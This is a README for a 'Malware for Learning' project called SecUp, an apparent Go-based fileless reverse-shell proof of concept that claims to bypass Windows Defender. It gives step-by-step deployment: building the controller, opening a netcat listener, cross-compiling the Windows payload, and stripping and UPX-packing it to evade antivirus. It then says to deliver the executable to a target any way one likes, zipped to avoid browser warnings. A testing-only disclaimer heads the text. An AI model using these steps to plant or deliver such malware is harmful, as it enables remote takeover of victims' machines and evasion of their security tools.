SecUp "Malware for Learning"

!!! FOR SECURITY TESTING PURPOSES ONLY !!!
******************************************************
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!

Fileless malware that bypasses Windows Defender using PowerShell and obfuscation.
Just a simple Reverse Shell using a batch script to kick things off, after which everything is fileless.

YouTube video demonstration and explanation >>> https://youtu.be/LjoAV3O40og

Setup and Execution

1. Clone this repo
   git clone https://github.com/daniellowrie/update_script
2. Build SecUp.go
   go build SecUp.go
3. Run SecUp
   ./SecUp 192.168.1.200
4. Open another terminal, and start a Listener on port 443 (sudo if not root)
   sudo nc -vnlp 443
5. Open another terminal, and compile EXE
   GOOS=windows go build update_script.go

• A word about comipiling for Windows...
  • I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
    • I've read that removing -ldflags and -trimpath may help and that the standard build is best for AV evasion
    • I've also read that packing can trip AV detection as well and again the standard build is best for AV evasion
      • BUT if you'd like to make the binary smaller...
        • GOOS=windows go build -ldflags "-s -w" -trimpath update_script.go
          
        • upx -9 update_script.exe

6. Back at the SecUp terminal
   Press ENTER to continue...
7. Upload and execute update_script.exe to target any way you like
   
8. Shellz! :)

I would recommend putting `update_script.exe` in a zip file for transfer to target as most browsers don't like when you download rando exectuables and will complain.

Going to work on building a better mousetrap as this was just a PoC at making something 'malicious' that could bypass Defender.

Update_Script-FINAL.mp4